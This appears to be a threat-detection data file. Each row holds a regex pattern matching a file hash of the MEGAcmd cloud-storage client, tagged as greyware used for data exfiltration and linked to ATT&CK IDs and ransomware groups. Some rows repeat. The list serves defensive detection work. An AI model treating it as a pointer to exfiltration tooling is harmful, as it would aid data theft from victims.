"*081bc7643ef925369e6a552549d998bdf92d15a9d0e1239a2502fadfe30dcd44*",".{0,1000}081bc7643ef925369e6a552549d998bdf92d15a9d0e1239a2502fadfe30dcd44.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*0db350f810a9f99c15d47e7c8d5588443952e00c0a49f88a6ffa776250b03a08*",".{0,1000}0db350f810a9f99c15d47e7c8d5588443952e00c0a49f88a6ffa776250b03a08.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*0e683610f7369c674cebc1ecf8d6e030f0433226887b902e74fe1e174c23a6a7*",".{0,1000}0e683610f7369c674cebc1ecf8d6e030f0433226887b902e74fe1e174c23a6a7.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*0f5947f5dbd2543c49853451d6d0deb64b04796e4c61327a1b5aa1c295b2a861*",".{0,1000}0f5947f5dbd2543c49853451d6d0deb64b04796e4c61327a1b5aa1c295b2a861.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*136759cb34240eab13e8251300ad1ebcf5e3d3f9c1f4fdd0ad01e71747f81431*",".{0,1000}136759cb34240eab13e8251300ad1ebcf5e3d3f9c1f4fdd0ad01e71747f81431.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*1489daf3d466bd60c6b175e66bb567396b95e269bedaa42c4516392c49028f06*",".{0,1000}1489daf3d466bd60c6b175e66bb567396b95e269bedaa42c4516392c49028f06.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*167d72cbaa49b8c6c54d57ab44ad9e907f4bf9551460574f4231a9dd956c4c32*",".{0,1000}167d72cbaa49b8c6c54d57ab44ad9e907f4bf9551460574f4231a9dd956c4c32.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*1e55e2b5357bce9f5fa54d2a12801dfba6c70262a6ddceae4b227a014db0aa92*",".{0,1000}1e55e2b5357bce9f5fa54d2a12801dfba6c70262a6ddceae4b227a014db0aa92.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*20c963d0749b58afccdb7d45ff36451015689bec1c035ee7bf809c7ee5b6b483*",".{0,1000}20c963d0749b58afccdb7d45ff36451015689bec1c035ee7bf809c7ee5b6b483.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*233717710c3ac45906e2cbd110a167d7779bd6697a508013c5b6559bbce97815*",".{0,1000}233717710c3ac45906e2cbd110a167d7779bd6697a508013c5b6559bbce97815.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*24d85b5700f05d7b638d294c87e8b8809df80f0611c63ee818f60ed487f1b4bc*",".{0,1000}24d85b5700f05d7b638d294c87e8b8809df80f0611c63ee818f60ed487f1b4bc.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*2cc646024fa74ade8763e8e9d030eaab511fb96b4c6cbac1059beae4e7654cb6*",".{0,1000}2cc646024fa74ade8763e8e9d030eaab511fb96b4c6cbac1059beae4e7654cb6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*2d98d3ea74419cd604113a4ccf8a360ebf31d8da740219c4c1f426cfe13afe5b*",".{0,1000}2d98d3ea74419cd604113a4ccf8a360ebf31d8da740219c4c1f426cfe13afe5b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*2ff46b2628610c91de2378a820fc1290e40c1d28029da8609a338ba7efe2a684*",".{0,1000}2ff46b2628610c91de2378a820fc1290e40c1d28029da8609a338ba7efe2a684.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*30612705f43fb5234efab3db8ec78568c8392cdf652cd5b7ef95c31a1876c670*",".{0,1000}30612705f43fb5234efab3db8ec78568c8392cdf652cd5b7ef95c31a1876c670.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*30fe5d62f0f47418dc83e03bc80977426010c8edcf01e4e7db820965e2781442*",".{0,1000}30fe5d62f0f47418dc83e03bc80977426010c8edcf01e4e7db820965e2781442.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*319a1fbefb63c3be58dcf357864f13ff21c664f0c15e535ac87723955e7826b1*",".{0,1000}319a1fbefb63c3be58dcf357864f13ff21c664f0c15e535ac87723955e7826b1.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*36a3dedaed8d89acb2703ab54c0f7ded489a1210b8e21935e970bddd3115e87c*",".{0,1000}36a3dedaed8d89acb2703ab54c0f7ded489a1210b8e21935e970bddd3115e87c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*383f712ce7d07385f41a48f0965db96ac74bea74e7eae0c297d973ad5a9be620*",".{0,1000}383f712ce7d07385f41a48f0965db96ac74bea74e7eae0c297d973ad5a9be620.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*38744af426f8304c5ee9c2857291225726bffe2788870f2cb9e6a3b8836297e6*",".{0,1000}38744af426f8304c5ee9c2857291225726bffe2788870f2cb9e6a3b8836297e6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*38744af426f8304c5ee9c2857291225726bffe2788870f2cb9e6a3b8836297e6*",".{0,1000}38744af426f8304c5ee9c2857291225726bffe2788870f2cb9e6a3b8836297e6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*3d74803de0136e858f96678e1cdea410256fbf34fc83c54edd204d186ecd412e*",".{0,1000}3d74803de0136e858f96678e1cdea410256fbf34fc83c54edd204d186ecd412e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*3e1b11f8d4839e0d7f09b7cc27a6d10a82b5944512a59dfa9192603f28b50baf*",".{0,1000}3e1b11f8d4839e0d7f09b7cc27a6d10a82b5944512a59dfa9192603f28b50baf.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*44026a4ab85bb59d02241e400848ac77be17c60fc86a0d07055e8ed8fe490ba2*",".{0,1000}44026a4ab85bb59d02241e400848ac77be17c60fc86a0d07055e8ed8fe490ba2.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*4a0231a6f5ccb7f5908a9d7f12987efa1b45ff2148214360b4a205f15e77075f*",".{0,1000}4a0231a6f5ccb7f5908a9d7f12987efa1b45ff2148214360b4a205f15e77075f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*4c77daadff57f64045bb324c78424a543c7703055d8e1827862e8b9920d541de*",".{0,1000}4c77daadff57f64045bb324c78424a543c7703055d8e1827862e8b9920d541de.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*4d4ca15944e2f75e8b86ee2bf92c458a40ed625bdc71e6d7d24d218c370c595b*",".{0,1000}4d4ca15944e2f75e8b86ee2bf92c458a40ed625bdc71e6d7d24d218c370c595b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*4e694c7eb85dcf55d7642f3504a5d63493e46ebd711735c57a45569ef2a7b88a*",".{0,1000}4e694c7eb85dcf55d7642f3504a5d63493e46ebd711735c57a45569ef2a7b88a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*4e703495f3616dd936afdfa2c32958189ae5e90328d9389b86e49a50654e6393*",".{0,1000}4e703495f3616dd936afdfa2c32958189ae5e90328d9389b86e49a50654e6393.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*4f3adf3695bebc9fbe10e01ab17ac24f71b146ace019a808aba29f8e8ffdecb8*",".{0,1000}4f3adf3695bebc9fbe10e01ab17ac24f71b146ace019a808aba29f8e8ffdecb8.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*551acd5364dcb82cadc68a6b1dd317b182fd797c0d6f170ce2ca922ad293fd1d*",".{0,1000}551acd5364dcb82cadc68a6b1dd317b182fd797c0d6f170ce2ca922ad293fd1d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*567d6614d077fa3fb569dd7a3d8fec5c0b3f6b09b0f82528f55337c637e76652*",".{0,1000}567d6614d077fa3fb569dd7a3d8fec5c0b3f6b09b0f82528f55337c637e76652.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*58574690db6cfff0ffa7864a0a13265ae1bd37d5fc3b0d9e0c88a1f7d69c193d*",".{0,1000}58574690db6cfff0ffa7864a0a13265ae1bd37d5fc3b0d9e0c88a1f7d69c193d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*59606376cabc50a19af3732cddbbcda40c59e0c85aa6bc0320420a6a19abca49*",".{0,1000}59606376cabc50a19af3732cddbbcda40c59e0c85aa6bc0320420a6a19abca49.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*5c3128dfd3f4d604afa6e602aca4a346d758d889400eb74584c88f1e40fe9bac*",".{0,1000}5c3128dfd3f4d604afa6e602aca4a346d758d889400eb74584c88f1e40fe9bac.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*5c3e73cd1ce2876596cad9dccb83f6243d0d6720b1059a663a36b084be5108d3*",".{0,1000}5c3e73cd1ce2876596cad9dccb83f6243d0d6720b1059a663a36b084be5108d3.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*5e71e62bfed96e5af56135c13f5e0c8ea26e589f8a7b74838d346954455cbbe0*",".{0,1000}5e71e62bfed96e5af56135c13f5e0c8ea26e589f8a7b74838d346954455cbbe0.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*5e7d3bce04b582aea59098cb2b11082a63d900c521775d962528564d258f7110*",".{0,1000}5e7d3bce04b582aea59098cb2b11082a63d900c521775d962528564d258f7110.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*61482ef4ebfebd390cc8409ac09b486c61bc71295cdda882e1f9b5b3cd1cea4d*",".{0,1000}61482ef4ebfebd390cc8409ac09b486c61bc71295cdda882e1f9b5b3cd1cea4d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*6364d746c3f1f0329fd67cec0f6a1f09ae3e521f3ef37b0ab728009cf55c4a5c*",".{0,1000}6364d746c3f1f0329fd67cec0f6a1f09ae3e521f3ef37b0ab728009cf55c4a5c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*6364d746c3f1f0329fd67cec0f6a1f09ae3e521f3ef37b0ab728009cf55c4a5c*",".{0,1000}6364d746c3f1f0329fd67cec0f6a1f09ae3e521f3ef37b0ab728009cf55c4a5c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*63916d22e904aeae13bc1fb08cc8a6f3f2e165fbf63f348dacdd6acffb780491*",".{0,1000}63916d22e904aeae13bc1fb08cc8a6f3f2e165fbf63f348dacdd6acffb780491.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*6678de2dac73cd8adb8e56721871afdee864f06aaf43fb1f854ea793148defd4*",".{0,1000}6678de2dac73cd8adb8e56721871afdee864f06aaf43fb1f854ea793148defd4.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*66a2764e71b7eed7243032dd66476e7aa59d9f4667005d8a4190197667fee9b5*",".{0,1000}66a2764e71b7eed7243032dd66476e7aa59d9f4667005d8a4190197667fee9b5.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
